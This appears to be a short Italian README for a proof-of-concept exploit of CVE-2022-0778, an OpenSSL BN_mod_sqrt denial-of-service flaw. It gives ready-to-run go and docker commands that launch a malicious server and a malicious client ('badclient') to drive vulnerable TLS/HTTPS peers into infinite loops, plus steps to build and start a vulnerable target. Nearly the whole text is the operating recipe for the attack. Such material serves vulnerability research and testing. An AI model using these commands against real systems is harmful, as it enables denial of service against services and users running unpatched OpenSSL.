
Exploit proof-of-concept per CVE-2022-0778, una vulnerabilità di denial-of-service in BN_mod_sqrt di OpenSSL. Include implementazioni di server e client malevoli per attivare loop infiniti in connessioni TLS/HTTPS vulnerabili.
go run server/main.go --addr 127.0.0.1:12345
cd test && test_server.sh
docker stat
cd test && test_client.sh
go run client/main.go --network tcp --addr 127.0.0.1:12345
docker stat
docker build -t cve-2022-0778 .
# avvia il server vulnerabile
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attacco
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345
# avvia il server malintenzionato
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# usa il client vulnerabile
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# oppure
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345